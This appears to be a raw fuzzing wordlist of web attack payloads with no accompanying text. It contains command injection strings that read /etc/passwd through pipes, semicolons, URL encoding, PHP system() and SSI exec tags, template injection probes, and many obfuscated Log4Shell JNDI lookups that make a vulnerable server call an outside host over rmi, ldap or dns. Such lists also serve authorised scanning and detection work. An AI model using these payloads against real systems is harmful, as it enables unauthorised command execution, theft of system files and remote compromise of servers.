|id #
`id`
$PATH
'$PATH
"$PATH
--help
--version
$(`cat /etc/passwd`)
|cat /etc/passwd
;cat /etc/passwd#
;cat /etc/passwd
%0Acat%20/etc/passwd
system('cat /etc/passwd');
<?php system("cat /etc/passwd");?>
%0Acat%20/etc/passwd
;system('cat%20/etc/passwd')
&lt;!--#exec%20cmd=&quot;/bin/cat%20/etc/passwd&quot;--&gt;
{{ get_user_file("/etc/passwd") }}
<!--#exec cmd="/bin/cat /etc/passwd"-->
@(7777*7777)
${7777*7777}
#{7777*7777}
T(7777*7777)
[=7777*7777]
${{7777*7777}}
{{7777*7777}}
{{= 7777*7777}}
{% debug %}
<%= 7777*7777 %>
<% 7777*7777 %>
{system('expr 60000000 + 481729')}
*{7777*7777}
${${::-j}${::-n}${::-d}${::-i}:${::-r}${::-m}${::-i}://{{l4jcheck.drstrange.org}}/314445},
${${::-j}ndi:rmi://l4jcheck.drstrange.org/314445},
${jndi:rmi://l4jcheck.drstrange.org/314445},
${jndi:rmi://l4jcheck.drstrange.org}/,
${${lower:jndi}:${lower:rmi}://l4jcheck.drstrange.org/314445},
${${lower:${lower:jndi}}:${lower:rmi}://l4jcheck.drstrange.org/314445},
${${lower:j}${lower:n}${lower:d}i:${lower:rmi}://l4jcheck.drstrange.org/314445},
${${lower:j}${upper:n}${lower:d}${upper:i}:${lower:r}m${lower:i}}://l4jcheck.drstrange.org/314445},
${jndi:dns://l4jcheck.drstrange.org/314445},
${jnd${123%25ff:-${123%25ff:-i:}}ldap://l4jcheck.drstrange.org/314445},
${jndi:dns://l4jcheck.drstrange.org},
${j${k8s:k5:-ND}i:ldap://l4jcheck.drstrange.org/314445},
${j${k8s:k5:-ND}i:ldap${sd:k5:-:}//l4jcheck.drstrange.org/314445},
${j${k8s:k5:-ND}i${sd:k5:-:}ldap://l4jcheck.drstrange.org/314445},
${j${k8s:k5:-ND}i${sd:k5:-:}ldap${sd:k5:-:}//l4jcheck.drstrange.org/314445},
${${k8s:k5:-J}${k8s:k5:-ND}i${sd:k5:-:}ldap://l4jcheck.drstrange.org/314445},
${${k8s:k5:-J}${k8s:k5:-ND}i${sd:k5:-:}ldap{sd:k5:-:}//l4jcheck.drstrange.org/314445},
${${k8s:k5:-J}${k8s:k5:-ND}i${sd:k5:-:}l${lower:D}ap${sd:k5:-:}//l4jcheck.drstrange.org/314445},
${j${k8s:k5:-ND}i${sd:k5:-:}${lower:L}dap${sd:k5:-:}//l4jcheck.drstrange.org/314445,
${${k8s:k5:-J}${k8s:k5:-ND}i${sd:k5:-:}l${lower:D}a${::-p}${sd:k5:-:}//l4jcheck.drstrange.org/314445},
${jndi:${lower:l}${lower:d}a${lower:p}://l4jcheck.drstrange.org},
${jnd${upper:i}:ldap://l4jcheck.drstrange.org/314445},
${j${${:-l}${:-o}${:-w}${:-e}${:-r}:n}di:ldap://l4jcheck.drstrange.org/314445}
